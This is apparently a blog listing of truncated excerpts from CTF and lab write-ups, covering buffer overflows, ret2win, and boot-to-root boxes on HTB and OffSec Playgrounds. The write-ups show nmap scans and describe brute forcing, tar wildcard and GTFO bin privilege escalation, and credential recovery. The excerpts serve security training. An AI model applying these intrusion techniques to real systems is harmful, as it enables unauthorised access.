PWN Namelen This challenge was an easy buffer overflow where you had to fill the buffer with a specific set of characters. Using Ghidra we can actually get to see this. We do get to see that the main function calls another function called bufcheck() Analyzing this function we see that there is an if function. The if function firs checks if sVar1 = 0x14. It also checks if the characters are i .

Machine info Nest is an easy difficulty Windows machine featuring an SMB server that permits guest access. The shares can be enumerated to gain credentials for a low privileged user. This user is found to have access to configuration files containing sensitive information. Another user and password is found through source code analysis, which is used to gain a foothold on the box. A custom service is found to be running, which is enumerated to find and decrypt Administrator credentials.

Introduction The p3rf3ctr00t CTF 2024 marked the debut of an exciting competition designed to challenge participants across diverse areas of cybersecurity. As one of the contributors of this event, I had the privilege of crafting some challenges that tested some problem solving skills. I will try and walk you through the design and solution of the challenges I created, providing insights into their concepts. Let’s learn. Flow First we are met with the challenge name Flow.

Introduction In today’s post, we have another easy box from offsec playgrounds. The goal here was to use a mix of automated tools to be able to brute the password of a user to get initial foothold. Then we could escalate our privileges using a nice GTFO bin. Let’s learn. Enumaration cat nmap.txt # Nmap 7.94SVN scan initiated Thu Apr 25 18:43:07 2024 as: nmap -sVC -T4 -vv -oN nmap.txt 192.

Introduction In this writeup we are going to check out a machine available on the offsec playgrounds. The idea here was to learn how to use curl and upload files that would ultimately help us into getting an initial foothold into the machine and then use the old tar wildcard to escalate our privileges. Let’s learn. Nmap sudo nmap -T4 -sVC 192.168.241.249 -oN nmap.txt -vv PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 61 vsftpd 3.

Introduction Today we have a medium box called chronicle where we do some git forensics to get a key that gives us some user access into the machine and then doing some bit of browser forensics that enables us to move laterally as another user. Where we now find a binary that we can use to escalate our privileges. Here is the challenge link. Enumaration So first of all we can start by doing some basic enumaration just to have a good idea of what our target looks like.

Step by step methodology Nmap scan First of all we can do some basic enumeration like checking for open ports and this is made possible by using a tool called nmap, which is used for network discovery and security auditing. We are also going to pass some options to the command let us break it down first: -sVC: These are options passed to Nmap: -s: This option specifies the type of scan to perform.

Get The Sword Can you get the sword ? Author : froghunter Download Link - 1 : https://drive.google.com/file/d/1HsQMxiZlP5978DzqnoZs6g6QOnCzVm_G/view Doing some basic file checks we see that the binary is a 32bit LSB executable which will really affect how we approach this challenge. The binary is also dynamically linked and not stripped. dexter@lab:~/the-lab/knights/rev$ file get_sword get_sword: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=4a9b260935bf815a04350e3bb9e0e4422f504b2a, for GNU/Linux 4.

102 Intoroduction So for the next challenge we are required to modify a variable’s value. This occurs when data larger than the allocated memory space (buffer) is written into that buffer. As a result, it can overwrite adjacent memory, including variables. But then if the stack grows downwards and the return address is above the variables space it should write the the memory below and not above, right? No, what happens is functions called later get stack frames at lower memory, and the return address is pushed to the higher address than the local variables.

103 Introduction Here we are met by a ret2win challenge, what this means is that we are required to call a function which does something that is not normal, example spawn a shell or in case of a CTF it prints out the flag. We can start by doing simple binary analysis for example checking the binary protections using checksec. Let us break all this down bit by bit. Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) Arch: amd64-64-little This line specifies the architecture of the binary.